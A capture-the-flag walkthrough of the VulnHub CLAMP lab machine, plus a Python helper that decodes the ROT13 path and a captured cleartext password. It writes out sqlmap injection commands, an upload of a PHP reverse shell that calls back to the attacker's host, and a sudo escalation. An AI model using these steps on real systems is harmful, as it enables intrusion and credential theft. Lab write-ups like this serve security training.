1. Target machine
CLAMP: 1.0.1 ~ VulnHub
2. Vulnerability reproduction
sudo arp-scan -l
nmap -p- 192.168.159.164 --min-rate=5000
http://192.168.159.164
dirb http://192.168.159.164
http://192.168.159.164/nt4stopc
The final binary string obtained is: 0110111001
Append it to the URL:
http://192.168.159.164/nt4stopc/0110111001
which redirects to
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/
Clicking the news item in the lower-right corner of Recommended Resorts redirects to
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1
sqlmap injection:
python3 sqlmap.py -u "http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --batch
python3 sqlmap.py -u "http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/go.php?id=1" --dbs --batch -D tatil --dump
hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf
Decode:
uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas
Append it to the URL:
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/upload.php
There is no submit button on the page, so create one yourself:
<input name='up' type='submit'>
The upload button appears; also notice that uploaded files are stored under the MD5 hash of their original file name.
locate php-reverse-shell.php
cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php # change the IP to the Kali host's address
echo -n "php-reverse-shell.php" | md5sum
2ad6bded962b884337eaeb921d7c2764
Upload php-reverse-shell.php
Start a listener on Kali:
nc -lvvp 1234
http://192.168.159.164/nt4stopc/0110111001/summertimesummertime/uvuvwevwevwe-onyetenyevwe-ugwemuhwem-osas/osas/2ad6bded962b884337eaeb921d7c2764.php
The reverse shell connects back successfully
python3 -c 'import pty;pty.spawn("/bin/bash")'
cd /var/www/html
ls
http://192.168.159.164/important.pcapng
Download it and analyze the traffic; the capture contains this form submission:
email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+just+mail+it.++Good+work.
mklpc-osas112.
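Two decoding steps in this walkthrough are done by hand: the hidden directory name (the shifted string turns out to be ROT13, which is why it decodes to uvuvwevwevwe-...) and the URL-encoded form body pulled out of important.pcapng. The Python below is an added example, not part of the original write-up, that reproduces both steps and shows the analyst's view of why an unencrypted HTTP form post is a credential leak. The regex in find_credential is an assumption about the "is: user:password" phrasing seen in this particular message, not a general rule.

```python
"""Decoding helpers for the CLAMP walkthrough (added example, not original page code)."""
import re
from urllib.parse import parse_qs

# Both input strings are copied from the walkthrough above.
ENCODED_PATH = "hihijrijrijr-balrgralrijr-htjrzhujrz-bfnf"
CAPTURED_FORM_BODY = (
    "email=mkelepce&message=Hello+there%2C+The+password+for+the+SSH+account+"
    "you+want+is%3A+mkelepce%3Amklpc-osas112.+If+you+encounter+a+problem%2C+"
    "just+mail+it.++Good+work."
)


def rot13(text: str) -> str:
    """Shift every ASCII letter 13 places; other characters (e.g. '-') pass through.

    ROT13 is its own inverse, so the same function encodes and decodes.
    """
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + 13) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + 13) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def decode_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into field -> value.

    parse_qs turns '+' into spaces and %XX escapes into characters, which is
    exactly what a sniffer sees once the POST body is reassembled.
    """
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def find_credential(message: str):
    """Return (user, password) from an 'is: user:password' phrase, or None.

    Heuristic for the message format in this capture (assumption, not general).
    """
    m = re.search(r"is:\s*(\S+?):(\S+)", message)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    print("decoded path:", rot13(ENCODED_PATH))
    fields = decode_form_body(CAPTURED_FORM_BODY)
    print("form fields:", fields)
    print("credential in cleartext:", find_credential(fields["message"]))
```

The practical lesson for the defender is in the second half: a help-desk message that carries a password over plain HTTP is recoverable by anyone holding the capture, with a one-line decode and no cryptanalysis at all.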
ssh mkelepce@192.168.159.164
mklpc-osas112.
sudo su